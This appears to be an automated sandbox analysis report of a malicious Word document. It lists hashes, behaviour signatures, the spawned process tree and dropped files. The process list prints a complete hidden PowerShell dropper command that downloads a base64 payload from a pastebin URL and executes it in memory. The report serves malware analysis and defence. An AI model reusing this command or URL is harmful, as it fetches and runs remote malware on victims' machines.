Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    24-07-2024 17:18

General

  • Target

    5fe9554ff8c4a81a2a99ff2a12a6393c0cc1e89e6291751db310913431785077.doc

  • Size

    781KB

  • MD5

    0949319f174a220b4e719715d9d5b20e

  • SHA1

    cdebf579f8f30226872d0b5bbeaeaa81877fe9c8

  • SHA256

    5fe9554ff8c4a81a2a99ff2a12a6393c0cc1e89e6291751db310913431785077

  • SHA512

    9e5f5362ea147aa19ae6ebe74cbf037b2a295343f01cab5b1a44a076954abf3773d77e3fae26e0ebf488b1fde579e2178a75183b6a74a5acb669b4ed503d9632

  • SSDEEP

    6144:rcnOY442OGwG1e3MenWfLds5Gn/RQQDPzuUC3uJXfr2opd91pV0mccMRdWIb8haR:rvCG1PenjQzi5Wyk/yJY0F

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://pastebin.com/raw/pw1Ht9hR

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5fe9554ff8c4a81a2a99ff2a12a6393c0cc1e89e6291751db310913431785077.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:332
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2128
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/pw1Ht9hR'))).EntryPoint.Invoke($null,$null)
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1976

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\53B49E3D.emf

      Filesize

      47KB

      MD5

      f8c7ec6da57ae75490132ff35cef2247

      SHA1

      962da8dd8ec8d636ebfeb3beecc296fa0b0e64f8

      SHA256

      849fdaaab3c0ca296b2c06a1d7b2f0779a594a0b796023810eda1d7606af31cb

      SHA512

      e44be74690c981f54b78765716abfb51e2f5108d034623bea9f5213dccd1b1342b9547370a09b7bf5a4f0c70c9d81c6d61d77e5fff6fe096e9313ba8b5a5d094

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      2f0f834345048da28b27f2fa6da7069c

      SHA1

      5c07a13a2ae65bed0ed1e9b9f22f413f00db18ed

      SHA256

      ee75dbaa8d608a14727b0d5015bbcfd03d2a61f92288ace767f54c582609df90

      SHA512

      7addddb2e71d5d98dd8fa17acc9dff260e22f2451e455a5a6c0fa286ea6f1780a52b199db4e890c70225c25b108a22b0bdd249a3c9a5fa1c8ccf9dcd6efd7fd8

    • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryFR040c.lex

      Filesize

      2B

      MD5

      f3b25701fe362ec84616a93a45ce9998

      SHA1

      d62636d8caec13f04e28442a0a6fa1afeb024bbb

      SHA256

      b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

      SHA512

      98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

    • memory/332-43-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/332-6-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/332-5-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/332-4-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/332-42-0x00000000715FD000-0x0000000071608000-memory.dmp

      Filesize

      44KB

    • memory/332-0-0x000000002F921000-0x000000002F922000-memory.dmp

      Filesize

      4KB

    • memory/332-2-0x00000000715FD000-0x0000000071608000-memory.dmp

      Filesize

      44KB

    • memory/332-65-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/332-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/332-69-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/332-68-0x00000000715FD000-0x0000000071608000-memory.dmp

      Filesize

      44KB

    • memory/1976-10-0x00000000054A0000-0x00000000054FB000-memory.dmp

      Filesize

      364KB